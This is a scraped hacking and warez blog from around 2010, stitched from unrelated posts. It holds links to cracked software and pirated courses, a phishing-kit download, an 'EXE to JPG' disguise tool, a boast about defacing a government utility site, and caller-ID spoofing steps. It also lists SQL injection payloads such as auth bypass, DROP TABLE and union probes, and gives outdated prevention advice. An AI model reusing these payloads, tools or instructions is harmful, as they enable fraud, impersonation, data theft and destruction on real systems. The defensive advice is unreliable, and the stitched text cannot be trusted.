GameBoost is a program that tunes your computer's settings for best performance during games and while surfing the Internet. GameBoost is based on the programs GameGain and Throttle. The utility optimizes your computer for maximum performance in online games and on your internet connection. It makes changes to the registry and system files to enhance memory performance, image rendering, animation, and Internet connection speed. All changes are made in accordance with the operating system and the type of Internet connection.

Changes in GameBoost - Updated and fixed the Windows 7 components which were causing random crashes for a small number of users running Windows 7 64-bit.

Language: English


OS: Windows All


Medician: Yes



DOWNLOAD LINKS:


DepositFiles ||  HotFile

Video Tutorial: AppDev Microsoft SQL Server 2010 For Developers DVD | 2.2 GB


In this course, you’ll learn about the features that are available in SQL Server, how to design and create a database, and how to build basic queries using Transact-SQL, the language of SQL Server. Then, you’ll learn how to build effective views, stored procedures, triggers, and user-defined functions using Transact-SQL. You’ll learn how to use the Transact-SQL programming language for error handling and hierarchical queries, dealing with complex data structures and processes, how to make your databases more scalable through partitioning, and how to use .NET languages like Visual C# and Visual Basic to build database objects.

Hotfile


Fileserve

Download C++ Tutorials Collection | 570.53 MB


  • C++ Console
  • C++ MFC
  • C++ Misc
  • C++ OpenGL
  • c++ programs
  • C++ video classes
  • C++ Win32
  • Visual C++
  • VTC – C++ movies
Download(Hotfile)
http://hotfile.com/dl/55938206/bb207a6/C___TUTORIALS_COLLECTION.part1.rar.html
http://hotfile.com/dl/55938212/15466d9/C___TUTORIALS_COLLECTION.part2.rar.html
http://hotfile.com/dl/55938177/f105e06/C___TUTORIALS_COLLECTION.part3.rar.html

Download(Uploading)
http://uploading.com/files/2a999d6a/C___TUTORIALS_COLLECTION.part1.rar/
http://uploading.com/files/m1af62cb/C___TUTORIALS_COLLECTION.part2.rar/
http://uploading.com/files/163f6683/C___TUTORIALS_COLLECTION.part3.rar/

Download(Sharingmatrix)
http://sharingmatrix.com/file/13487815/C___TUTORIALS_COLLECTION.part1.rar
http://sharingmatrix.com/file/13487849/C___TUTORIALS_COLLECTION.part2.rar
http://sharingmatrix.com/file/13487947/C___TUTORIALS_COLLECTION.part3.rar

Download(Fileserve)
http://www.fileserve.com/file/6YxHzRc/C___TUTORIALS_COLLECTION.part1.rar
http://www.fileserve.com/file/D23Arsp/C___TUTORIALS_COLLECTION.part2.rar
http://www.fileserve.com/file/42Kpqr8/C___TUTORIALS_COLLECTION.part3.rar

Sunday, July 18, 2010

Easy - Auto Phisher Maker v2.7.7

Screenshot: [from older version]



Greetings ALBoRaaQ-TeAm


Code:
http://rapidshare.com/files/386795727/Easy_-_Auto_Phish

Hyderabad Electric Supply Company www.hesco.gov.pk website hacked By Adnan Anjum And Team

HESCO-- Hyderabad Electric Supply Company www.hesco.gov.pk website hacked by PUNJABI HACKERS. Don't worry, no change in any schedule & nothing has been deleted. Also no page has been uploaded as this is a very critical website for PAKISTAN, so we have respect for such BIG CRITICAL sites. It's not working now. Seems down for patching up the vulnerabilities. Special Thanks To Amarjeet Singh.

WE CAN MANAGE ALL SCHEDULING


Pakistani Hackers

Latest Defacement of Indian Website (http://iinas.info/) by Pakistani Hackers

Pakistani Hackers are on FIRE..
Indian Hackers are also not Behind.


Wednesday, July 14, 2010

Call Spoofing

Earlier there was a call spoofing method, but it's not working now. But I have come across a new method that is fully working. Use it to call anyone using anybody else's number. You can also change your voice pitch so that the other person can't recognize you.

Warning-Only for educational purposes.
1. Open http://www.crazycall.net
2. Select your country and wait for the page to load.
3. Enter the number you want to display in the first big box (don't change the contents of the small box if the fake number is from the same country).
4. Enter the number you wish to call in the second big box.
5. Choose voice pitch as normal (for the same voice) or high or low pitch to change your voice.
6. Click Get me a code.
7. Dial the number shown on the right and enter the shown code when asked.

EXE to JPG Converter









Download Code :-


Code:
http://www.megaupload.com/?d=B1XJZIF3

Prevention from Sql Injection Attack in PHP

To avoid SQL injection attacks, follow these simple mechanisms in PHP:

1) Always restrict the length of form fields; for example, don't allow more than 20 characters in fields like username and password, using the "maxlength" property available in the HTML form.

2) Always validate for proper input, such as whether the value is a valid email or not, is numeric or not, is a valid date or not, etc.

3) Finally, always use the mysql_real_escape_string() function before sending the variable to the SQL query, it ad. For example:

Note: you must be connected to the database to use this function.
 
Code:
$username=mysql_real_escape_string($_POST['username']);
$password=mysql_real_escape_string($_POST['password']);

If an intruder injects ' OR 1 into the username and password fields, then the values of $username and $password will become \' OR 1, which is not going to harm us anymore.



This might also help someone:

.htaccess

Code:
# Block out any script trying to set a mosConfig value through the URL

RewriteCond %{QUERY_STRING} mosConfig_[a-zA-Z_]{1,21}(=|\%3D) [OR]

# Block out any script trying to base64_encode crap to send via URL

RewriteCond %{QUERY_STRING} base64_encode.*\(.*\) [OR]

# Block out any script that includes a 

What is SQL Injection?


SQL Injection

SQL injection is the most common methodology employed by hackers to exploit vulnerabilities in software applications. Vulnerabilities are basically weak links in the software that expose unauthorized data/information to a user. SQL injection occurs when user input is incorrectly filtered for embedded SQL statements.

The technique is powerful enough not only to expose information to the user but also to modify and delete content, which could prove disastrous to the company.

SQL injection vulnerabilities have three forms:


Incorrectly filtered special characters: escape characters

                                                                       

This form of SQL injection occurs when the user manipulates the SQL statement using characters such as '. For instance, consider that you need to enter a username and password when logging into your account. The SQL statement generated will be:

"SELECT * FROM users WHERE password = '" + password + "';"

Now suppose the username and/or password entered is "' or '1'='1". The SQL statement reaching the back end will be:

"SELECT * FROM users WHERE password = '' or '1'='1';"

Look closely at this statement. The database reads it as: select everything from the table "users" where the password field equals '' or '1'='1'. During the authentication process this condition is always true, because 1 always equals 1. In this way the user is given unauthorized access.
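The bypass described above next to its fix, as an added example that is not code from the original page: bound parameters (PDO prepared statements) keep the input out of the SQL text altogether, which also replaces the mysql_real_escape_string() advice in the PHP section, since the mysql_* extension was removed in PHP 7. The in-memory SQLite database, the table layout and the function names are assumptions made for the demo.

```php
<?php
// Added example: in-memory SQLite stands in for the real database.
// Table, column and function names are assumptions made for this demo.
// Plain-text passwords only mirror the page's query; real systems store password_hash() output.
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec("CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT)");
$db->exec("INSERT INTO users (username, password) VALUES ('alice', 's3cret-A'), ('bob', 's3cret-B')");

// Vulnerable form from the text: the password is concatenated into the SQL string.
function loginConcatenated(PDO $db, string $password): array
{
    $sql = "SELECT username FROM users WHERE password = '" . $password . "';";
    return $db->query($sql)->fetchAll(PDO::FETCH_COLUMN);
}

// Hardened form: the statement is prepared with placeholders and the values are
// bound separately, so they can never change the structure of the query.
function loginPrepared(PDO $db, string $username, string $password): array
{
    $stmt = $db->prepare("SELECT username FROM users WHERE username = :u AND password = :p");
    $stmt->execute([':u' => $username, ':p' => $password]);
    return $stmt->fetchAll(PDO::FETCH_COLUMN);
}

$payload = "' or '1'='1";   // input quoted in the text above

// The concatenated query ends in: WHERE password = '' or '1'='1';
// The OR branch is always true, so every account matches.
var_dump(loginConcatenated($db, $payload));

// As a bound parameter the same input is compared as a literal string.
var_dump(loginPrepared($db, 'alice', $payload));

// A correct credential pair still logs in.
var_dump(loginPrepared($db, 'alice', 's3cret-A'));
```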


Some important inputs used by hackers for the SQL injection technique are:

a) ' or 'a'='a
b) ' or 1=1 --
c) ' or 1=1; --
d) '; select * from *; --
e) ' (single quote; here we look at the error)
f) '; drop table users --

On some SQL servers such as MS SQL Server any valid SQL command may be injected via this method, including the execution of multiple statements. The following value of “username” in the statement below would cause the deletion of the “users” table as well as the selection of all data from the “data” table (in essence revealing the information of every user):

a';DROP TABLE users; SELECT * FROM data WHERE name LIKE '%

Incorrectly handling input data type


This form of SQL injection occurs when the user input is not strongly typed, i.e., the input is not checked against data type constraints. For example, consider a field where you are asked to enter your phone number. Since a phone number is of numeric data type, the input must be checked to confirm that it is numeric. If it is not checked, the user can send alphanumeric input with embedded SQL statements. Consider the following SQL statement:

"SELECT * FROM user WHERE telephone = " + input + ";"

Now if I can input alphanumeric data, say "11111111;DROP TABLE user", then I have embedded an SQL statement to delete the entire table "user". This might prove detrimental to the company!
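Quote escaping does not help when the value sits in an unquoted numeric position, as in the telephone query above; this added example (not from the original page) shows that case beside the server-side type and length check that the PHP prevention steps call for. The in-memory SQLite database, the function names, the 15-digit limit and the input `0 OR 1=1` are assumptions constructed for the demo.

```php
<?php
// Added example: in-memory SQLite stands in for the real database.
// Table layout, function names and the 15-digit limit are assumptions.
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec("CREATE TABLE user (id INTEGER PRIMARY KEY, name TEXT, telephone INTEGER)");
$db->exec("INSERT INTO user (name, telephone) VALUES ('alice', 11111111), ('bob', 22222222)");

// Vulnerable form from the text: the value lands in an unquoted numeric position.
// Escaping quotes changes nothing, because the input needs no quote to alter the query.
function findByPhoneConcatenated(PDO $db, string $input): array
{
    $escaped = str_replace("'", "''", $input); // stand-in for a quote-escaping function
    $sql = "SELECT name FROM user WHERE telephone = " . $escaped;
    return $db->query($sql)->fetchAll(PDO::FETCH_COLUMN);
}

// Hardened form: enforce type and length on the server, then bind as an integer.
// An HTML maxlength attribute is only a browser hint and is not a server-side check.
function findByPhoneValidated(PDO $db, string $input): array
{
    if (!ctype_digit($input) || strlen($input) > 15) {
        throw new InvalidArgumentException('telephone must be 1-15 digits');
    }
    $stmt = $db->prepare("SELECT name FROM user WHERE telephone = :t");
    $stmt->bindValue(':t', (int) $input, PDO::PARAM_INT);
    $stmt->execute();
    return $stmt->fetchAll(PDO::FETCH_COLUMN);
}

// Constructed inputs: one with no quote character, and the one quoted in the text.
$hostile = ["0 OR 1=1", "11111111;DROP TABLE user"];

// The WHERE clause becomes "telephone = 0 OR 1=1", which is true for every row.
var_dump(findByPhoneConcatenated($db, $hostile[0]));

foreach ($hostile as $input) {
    try {
        findByPhoneValidated($db, $input);
    } catch (InvalidArgumentException $e) {
        echo "rejected '$input': ", $e->getMessage(), "\n";
    }
}

// A well-formed number still finds its row.
var_dump(findByPhoneValidated($db, "11111111"));
```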

If you happen to know the database table name and column names, then any user can perform SQL injection using the following inputs:


1. ' having 1=1 --
2. ' group by user.id having 1=1 --
3. ' group by users.id, users.username, users.password, users.privs having 1=1 --
4. ' union select sum(users.username) from users --
5. ' union select sum(id) from users --

Vulnerabilities inside the database server


Sometimes vulnerabilities can exist within the database server software itself, as was the case with the MySQL server’s real_escape_chars() functions.

If the database server is not properly configured, then access to the database can easily be discovered by the hacker.
The hacker can get information regarding the database server using the following input:
' union select @@version,1,1,1 --

Extended Stored Procedure Attacks

1. sp_who: this will show all users that are currently connected to the database.
2. xp_readmail, , , , ,@peek='false': this will read all the mails and leave the messages as unread.

In the same way there is a list of such extended stored procedures that can be used by the hacker to exploit vulnerabilities existing in software application at the database layer.
